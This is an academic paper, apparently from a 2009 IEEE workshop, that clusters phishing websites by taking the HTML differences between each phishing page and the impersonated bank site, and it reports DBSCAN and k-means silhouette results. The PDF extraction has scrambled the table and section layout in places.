Symposia and Workshops on Ubiquitous, Autonomic and Trusted Computing
Using differencing to increase distinctiveness for phishing website clustering Robert Layton
Simon Brown
Paul Watters
Internet Commerce Security Laboratory Internet Commerce Security Laborator Internet Commerce Security Laboratory University of Ballarat University of Ballarat University of Ballarat Ballarat, Australia Ballarat, Australia Ballarat, Australia Email:
[email protected] Email:
[email protected] Email:
[email protected]
Abstract—Phishing webpages present a previously underused resource for information on determining provenance of phishing attacks. Phishing webpages aim to impersonate a legitimate website in order to trick their potential victims into revealing their confidential data, such as usernames and passwords. However different phishing webpages often contain small differences and these differences can provide a great deal of evidence on the provenance of phishing attacks. When impersonating a webpage, there is often a large amount of ‘redundant’ information, as much of the original, impersonated website is found in phishing websites, making phishing websites across different attacks very similar. In order to attempt to overcome this issue, a diff can be used which takes the phishing and original websites as input and returns the differences between the two. These differences present a new view on the data that is previously unused and presents a novel way to increase the ability of clustering algorithms to find good, distinct and separated clusters within the data. The research presented here outlines this diff process and shows that for the data used, comparable results were obtained while the dimensionality of the dataset was reduced. This reduction in size allows for clustering algorithms to complete faster, due to the reduced dimensionality of the dataset.
I. I NTRODUCTION Phishing is a form of online fraud that causes direct losses estimated at about $US61 million dollars a year ([4]) and unknown indirect losses believed to be in the billions [3] due to lost trust between customers and legitimate corporations. Phishing attacks attempt to trick the user into revealing confidential information which can then be used to steal the victim’s identity and perform tasks such as online banking, taking our loans or stealing confidential information. Phishing attacks often contain two major elements, an email and a webpage. The email aims to trick the user into navigating to the webpage and then the webpage requests the user to enter in their personal, hidden details, which are then used later for profit. Phishing emails have long been a target for research for detection, classification and in user education. However the phishing webpages have often been neglected, despite the potential amount of information in them. The potential benefits of using phishing webpage data in order to distinguish provenance in phishing attacks were highlighted in [8]. Despite the gains achieved in that research it was found to be difficult to achieve good clusterings, due to the free parameters of the clustering algorithms and the problems in 978-0-7695-3737-5/09 $25.00 © 2009 IEEE DOI 10.1109/UIC-ATC.2009.62
488
finding good parameters for the dataset and intended purpose of the clusterings. Determining provenance of a series of crimes (such as phishing) is a key element that helps law enforcement agencies (LEAs) determine how to use their resources to track down and stop these crimes. Bigger phishing attacks present a better way for LEAs to use their resources, as they provide more information to be tracked, as well as provide a bigger payoff if the phisher is caught. Determining which phishing events belong to these bigger phishing attacks is a difficult task, due to obfuscation techniques such as using botnets to obfuscate the origins of attacks or source code obfuscation to make filtering more difficult. Botnets are particularly difficult to trace, using techniques such as fast flux ([5]) to make it difficult to monitor where attacks come from and where the stolen credentials go. Despite this, forensic methods used on phishing emails in [9] suggest that just 3 major groups account for 86% of all attacks. If automated systems can be developed that can automatically derive the provenance of phishing attacks, LEAs can focus their attention on taking down major phishing operations, drastically reducing the problem of phishing. Diffing algorithms are algorithms designed to take two objects as their input, and return a list of the differences between the two. One of the first examples was the diff program for Unix systems in the early 1970s [6]. Since then there have been programs developed that create a diff (a list of the differences) for binary files, HTML files and many other files. By only tracking changes instead of the complete newer version, diffs often reduce the amount of information needed to store multiple versions of the same set of files and are a key component in source control systems such as CVS, SVN and git. Diff programs attempt to solve the LCS problem (longest common subsequence) in order to create diff descriptions that are the smallest possible size. Diffs for specific types of files, such as binary or HTML files, can use heuristics to more quickly determine the LCS. This article aims to increase the ability of clustering algorithms to find good, distinct clusters by using a diff-algorithm to discover differences between the phishing webpage and the actual webpage that is being impersonated.
II. P REVIOUS W ORK
III. M ETHODOLOGY
A. Phishing provenance Determining provenance of phishing attacks is a current difficulty for anti-phishing organizations, as phishers employ a variety of means to obfuscate their identities, locations and motives. Profiling presents one of the best avenues of determining provenance, as these attributes of phishers can be determined with adequate profiles. In [2], phishing was described as a technique whereby a set of characteristics of a particular class of person is inferred from past experience, and data-holdings are then searched for individuals for close fit to that set of characteristics’. This definition suggests that by finding traits that are common between the phishing attacks, it can be inferred that the origin of those phishing attacks are similar. It was suggested that there is a ‘level of organization in phishing attacks‘ in [9], and it was also found that just 3 groups were responsible for around 86% of all phishing attacks in a particular sample. This suggests that there are viable targets for law enforcement agencies (LEAs) to target in their investigations, and that the downfall of just three groups would drastically reduce the amount of phishing attacks.
The data used will be a collection of 24403 websites collected by a phishing attack tracking program that records changes to the website hosted at URLs that are known to contain or have contained phishing websites targetted at a major financial institution. The data is dirty, containing phishing and non-phishing websites, however it is reasonable to assume that any process that will be setup to track incoming data should be expected to handle dirty data in some form. In this research, the dirty data is considered part of the dataset and is not filtered or altered in anyway. The process used by [8] will be used in this research to model and cluster the datasets. Firstly, a bag-of-words model will be applied to the dataset, which usually results in a dataset with a high dimensionality and redundant features. This bagof-words model is then reduced using Principle Component Analysis (PCA) to find the top n features (linear components of the dataset) that account for over 90% of the variability in the data. This data is then clustered using DBSCAN and an iterative k-means algorithm as described in [8]. The effectiveness of the clustering algorithm is then determined by using the silhouette coefficient to determine the distinctness of the clusters. The algorithm is presented in algorithm 1.
B. Diff The original diff program is a utility written for Unix systems in the early 1970s and using the methods described in [6]. The diff utility takes two text files as input and present a third file, which was a set of instructions for changing the first file into the second. This set of changes is called a diff, and the goal of a diff program is often to create a diff file that is as small as possible, although other optimizations such as using less memory or finishing quickly at the cost of diff file size are also available. A diff program can be thought of as a compression algorithm, described in [7] as a Delta algorithm, which ‘compress(es) data by encoding on file in terms of another’. For this reason, diffs are used in version control systems such as CVS, SVN and git. As well as this, data backup programs can use diffs to reduce the size of regular backups which has cost saving benefits by reducing the amount of data that needs to be saved in long term storage. In most diff versions, the diff used is a set of instructions required to transform the first document into the second. This set of operations is often called the diff, however in this research, we use the term diff to mean the source code that is in the first document (the phishing website) that is not in the second document (the original website). To the authors knowledge, this is the first time that diffs have been used to simplify the clustering process for webbased problems such as phishing. However this process does not generalize easily and is specifically targetted against impersonation attacks. Phishing websites deliberately attempt to impersonate legitimate websites, and as a result, this process is applicable to them. One other field where this methodology could be useful is in determining copyright infringement through content copied to third party websites.
Algorithm 1 The RAW methodology 1) Apply the bag-of words model on the source code of the phishing websites. 2) Use PCA to reduce the model to the top n features that account for 90% of the total variance. 3) Cluster the reduced model using a standard clustering algorithm such as k-means. 4) Test the model using the silhouette coefficient. To test whether using HTML diff creates a positive influence on the clustering process, two different datasets are created from the initial source code of the data. The first follows the steps outlined in algorithm 1 and will be referred to as the RAW methodology. The second dataset is created by adding a step 0 to algorithm 1, in which the source code is diffed against the online banking website of the institution that the phishing attacks are trying to impersonate. This will be referred to as the DIFF methodology, and part from this one difference, the methodologies will be the same. Algorithm 2 The DIFF methodology 0) Run a HTML aware diff program on the website source code versus the online banking website targeted 1) Apply the bag-of words model on the diffs of the phishing websites. 2) Use PCA to reduce the model to the top n features that account for 90% of the total variance. 3) Cluster the reduced model using a standard clustering algorithm such as k-means. 4) Test the model using the silhouette coefficient.
489
The HTML diffing process that will be applied in the DIFF methodology works by finding elements that are common to each tree. Broken tags are not fixed allowing the case where two websites differ due to one having a broken tag that the other does not to result in a difference between the pages, as expected. An optimization for speed is used in the diffing process, where higher level elements, such as < body > or < head >, are checked before smaller tags such as their child elements. This works recursively in order to find the largest elements in common, which reduces the amount of work required to complete the diff. The final step results in finding strings that match between the websites and removing those as well. After the common elements are removed, the remaining code is kept (even if it is not valid) and the result is the difference between the original (the source code of the phishing website) and the source code from the online banking website. One problem that could face HTML diffing is the concept of order, where HTML elements that are otherwise equal are reordered to different parts of the source code. It is possible to create the same webpage with reordered source code, which could cause problems in determining what has been changed and what has not. The HTML diffing process used in the DIFF methodology accounts for this, and any results are then modelled using the bag-of-words model, which ignores order anyway, resulting in the same model being found for the same source code reordered.
eps 0.02 0.04 0.06 0.08 0.1 0.12 0.14 0.16 0.18 0.2 0.22 0.24 0.26 0.28
A. DBSCAN The websites where then clustered using these features and the results are given in table I. Smaller values for the eps value and neighbourhood size resulted in more defined clusterings, which can be expected. This is due to the fact that by keeping
Neighbourhood size 15 25 35 0.89 0.94 0.86 0.93 0.94 0.89 0.81 0.8 0.8 0.8 0.81 0.8 0.72 0.72 0.72 0.72 0.72 0.72 0.72 0.72 0.72 0.72 0.72 0.73 0.71 0.71 0.71 0.72 0.72 0.72 0.68 0.68 0.68 0.68 0.68 0.68 0.61 0.61 0.63 0.62 0.62 0.62
45 0.94 0.88 0.8 0.8 0.74 0.72 0.72 0.72 0.7 0.72 0.69 0.68 0.62 0.62
TABLE I R ESULTS FOR DBSCAN USING THE RAW METHODOLOGY
eps 0.02 0.04 0.06 0.08 0.1 0.12 0.14 0.16 0.18 0.2 0.22 0.24 0.26 0.28
IV. R ESULTS Applying the bag-of-words technique to the raw source code resulted in 663 dimensions, which was reduced to 17 after applying PCA feature selection. The DIFF methodology differs from the RAW methodology by just in the inclusion of a step ‘0’, where the source code from each website is diffed against the standard online banking website for the bank that was being impersonated by most of the attacks. A smaller set of dimensions was found using the bag-ofwords model, just 400 compared to the 663 without using the HTML diff. After applying PCA feature selection, 13 dimensions were discovered that account for over 90% of the variance, again a smaller amount of dimensions than in the RAW methodology. This is a net reduction of 4 features, which is a 23.5% reduction, which was evident in the size of the resulting datasets (2092kb compared to 2693kb). Smaller datasets are generally easier to cluster, due to the problems of high dimensionality given in [1]. While the DIFF methodology results in smaller datasets, the results need to be comparable in order for the process to be worth the extra time required to create the diffs of the files, and this outcome is shown in this section.
5 0.97 0.92 0.83 0.81 0.73 0.73 0.73 0.73 0.7 0.72 0.69 0.69 0.61 0.61
5 0.95 0.92 0.83 0.82 0.73 0.73 0.73 0.73 0.71 0.72 0.69 0.69 0.61 0.61
Neighbourhood size 15 25 35 0.88 0.97 0.97 0.9 0.88 0.93 0.81 0.83 0.8 0.81 0.8 0.81 0.73 0.72 0.72 0.73 0.72 0.71 0.72 0.72 0.72 0.73 0.72 0.73 0.71 0.71 0.7 0.72 0.72 0.72 0.68 0.69 0.69 0.69 0.69 0.68 0.62 0.61 0.63 0.61 0.61 0.6
45 0.86 0.94 0.82 0.8 0.74 0.71 0.72 0.73 0.7 0.72 0.69 0.68 0.59 0.62
TABLE II R ESULTS FOR DBSCAN USING THE DIFF METHODOLOGY
the neighbourhood size the same and altering the eps value, a heirarchical clustering model can be made, where clusters of one eps value are subsets of clusters from a larger eps value. The same is true for the neighbourhood size, due to the less restricted environment. Applying the DIFF methodology on the data provided results which are shown in table II, showing similar relative results as the RAW methodology shows, where smaller eps and neighbourhood size values result in more defined clustering, as expected. A comparison table (the values from table I subtacted from the corresponding values from table II) is given in table III. While the DIFF methodology resulted in a higher mean silhouette coefficient overall for the parameters tested, the p-value for the hypothesis that ‘the RAW methodology creates the same results as the DIFF methodology’ is 0.66, indicating no significant difference. This is despite the reduced number of features from the DIFF methodology, meaning that comparable clusterings were found using less information. B. Iterative k-means The iterative k-means algorithm was run with 30 starting positions per k value, for k values between 2 and 60 for both
490
Fig. 1.
eps 0.02 0.04 0.06 0.08 0.1 0.12 0.14 0.16 0.18 0.2 0.22 0.24 0.26 0.28
5 -0.03 0.00 0.00 0.01 0.00 0.00 0.00 0.00 0.00 0.00 -0.01 -0.01 0.00 -0.01
Comparison between DIFF and RAW methodologies for the Iterative k-means algorithm
Neighbourhood 15 25 -0.01 0.03 -0.04 -0.06 0.00 0.03 0.01 0.00 0.01 0.00 0.01 0.01 0.00 0.00 0.01 0.00 0.00 -0.01 0.00 0.00 0.00 0.01 0.01 0.01 0.01 0.00 -0.01 -0.01
size 35 0.11 0.05 -0.01 0.02 0.01 -0.01 -0.01 0.00 0.00 -0.01 0.01 0.00 -0.01 -0.01
45 -0.08 0.06 0.03 0.00 0.00 -0.01 0.00 0.00 0.00 0.00 0.00 0.00 -0.03 0.00
TABLE III C OMPARISON TABLE : TABLE II MINUS TABLE I
the RAW and DIFF methodologies. The results are given in tables IV and V, showing good values for both methodologies. Visible from the results are a consistently higher result for the DIFF methodology when compared to the RAW methodology, when k is 3 or above, and this improvement is significant with p-values of 0.000 for k values 4 or above 1 . This difference is visible also in figure 1, showing a clear benefit to using the DIFF methodology for this clustering algorithm. By using the DIFF methodology, the clusters are better defined, allowing greater confidence in the model.
k
Mean
Var
2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
0.415 0.501 0.538 0.562 0.526 0.565 0.555 0.574 0.596 0.584 0.550 0.567 0.575 0.606 0.617 0.614 0.656 0.645 0.660 0.665 0.692 0.697 0.733 0.745 0.746 0.778 0.763 0.810 0.804
0.049 0.020 0.006 0.005 0.009 0.007 0.009 0.008 0.005 0.005 0.006 0.008 0.009 0.007 0.007 0.006 0.002 0.007 0.011 0.004 0.006 0.006 0.006 0.003 0.004 0.005 0.003 0.003 0.002
k 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60
Mean 0.809 0.830 0.844 0.838 0.865 0.875 0.872 0.883 0.885 0.881 0.896 0.895 0.908 0.923 0.911 0.918 0.915 0.917 0.928 0.931 0.919 0.917 0.931 0.932 0.943 0.943 0.942 0.945 0.946 0.950
Var 0.003 0.003 0.002 0.003 0.001 0.001 0.002 0.002 0.001 0.001 0.001 0.001 0.001 0.001 0.001 0.001 0.001 0.001 0.001 0.001 0.001 0.001 0.001 0.001 0.000 0.000 0.000 0.000 0.000 0.000
TABLE IV I TERATIVE k- MEANS RESULTS FOR THE RAW METHODOLOGY, 30 RESTARTS PER k VALUE
V. C ONCLUSION Using a HTML diff instead of the original source code has proven to be an effective method to reduce the complexity of the phishing website clustering problem, while maintaining comparable results or even producing better results then the RAW methodology. There was shown to be little difference between the DIFF methodology and the RAW methodology for DBSCAN, despite a 23.5% reduction in the size of the dataset, from 17 to 13 features. This allows clustering algorithms to run faster and use more complex algorithms while still finding 1 the
p-value is 0.02 for k = 2 and 0.03 for k = 3
clusterings of comparable quality. The DBSCAN algorithm reported a non-significant increase in the mean silhouette coefficient, signally potential benefits in using this methodology. The Iterative k-means algorithm reported a significant increase when using the DIFF methodology, indicating that the simpler model used by k-means lends itself better to simpler datasets. Not only were the results better than the RAW methodology, they were also very high, with silhouette coefficient values above 0.9 for k values above 27. This indicates that the model fits the data very well and that this
491
k
Mean
Var
2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
0.3996 0.5622 0.5826 0.6445 0.5969 0.6455 0.6401 0.6498 0.6930 0.6743 0.6704 0.6838 0.6898 0.7388 0.7312 0.7641 0.7822 0.7771 0.8148 0.8172 0.8330 0.8377 0.8559 0.8781 0.8953 0.9095 0.9194 0.9236 0.9203
0.134 0.005 0.011 0.007 0.011 0.012 0.014 0.013 0.011 0.010 0.011 0.015 0.013 0.008 0.012 0.008 0.007 0.007 0.006 0.004 0.005 0.007 0.005 0.002 0.003 0.002 0.001 0.002 0.001
k 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60
Mean 0.9251 0.9352 0.9416 0.9437 0.9438 0.9610 0.9461 0.9519 0.9619 0.9522 0.9596 0.9589 0.9633 0.9712 0.9638 0.9700 0.9726 0.9712 0.9782 0.9796 0.9723 0.9771 0.9822 0.9876 0.9881 0.9863 0.9926 0.9907 0.9979 0.9919
Var 0.001 0.001 0.001 0.001 0.001 0.000 0.000 0.001 0.001 0.001 0.001 0.001 0.000 0.001 0.001 0.001 0.001 0.001 0.001 0.000 0.001 0.001 0.001 0.000 0.000 0.001 0.000 0.000 0.000 0.000
[2] R. Clarke. Profiling: A hidden challenge to the regulation of data surveillance. Journal of Law and Information Science, 4:403, 1993. [3] F. T. Commission. Identity theft survey report. Technical report, www.ftc.gov/os/2007/11/SynovateFinalReportIDTheft2006.pdf., 2007. [4] C. Herley and D. Florencio. A profitless endeavor: Phishing as tragedy of the commons. New Security Paradigms Workshop, 2008. [5] T. Holz, C. Gorecki, K. Rieck, and F. Freiling. Measuring and detecting fast-flux service networks. In Proceedings of the Network & Distributed System Security Symposium, 2008. [6] J. Hunt, M. McIlroy, and B. T. Laboratories. An Algorithm for Differential File Comparison. Bell Laboratories, 1976. [7] J. J. Hunt, K.-P. Vo, and W. F. Tichy. Delta algorithms: an empirical analysis. ACM Trans. Softw. Eng. Methodol., 7(2):192–214, 1998. [8] R. Layton and P. Watters. Determining provenance of phishing websites using automated conceptual analysis. submitted, 2009. [9] S. McCombie, P. Watters, A. Ng, and B. Watson. Forensic characteristics of phishing - petty theft or organized crime? In J. Cordeiro, J. Filipe, and S. Hammoudi, editors, WEBIST (1), pages 149–157. INSTICC Press, 2008.
TABLE V I TERATIVE k- MEANS RESULTS FOR THE DIFF METHODOLOGY, 30 RESTARTS PER k VALUE
method should be used in place of the RAW methodology in future research into phishing website provenance. There is an initial trade-off in speed for the HTML diff algorithm to take place. Whether this results in a faster overall time between start and finish depends obviously on the choice of the clustering algorithm. Despite this, clustering new instances does not require the diff to take place, as the bagof-words model can be applied to find an appropriate feature vector for the new instance without the diff, as the ‘words’ will be in the source code regardless. Future work in this area can look at this property in order to speed up the diff process by finding the diff of just a sample of the dataset, and using the resulting bag-of-words model to model the other instances without needing to run the diff process again for the new instances. This could speed up the entire process, reducing much of the lost speed by using the DIFF methodology instead of the RAW methodology. ACKNOWLEDGMENT This research was funded by the State Government of Victoria, IBM, Westpac, the Australian Federal Police and the University of Ballarat. R EFERENCES [1] K. Beyer, J. Goldstein, R. Ramakrishnan, and U. Shaft. When is ‘nearest neighbor‘ meaningful? LECTURE NOTES IN COMPUTER SCIENCE, pages 217–235, 1999.
492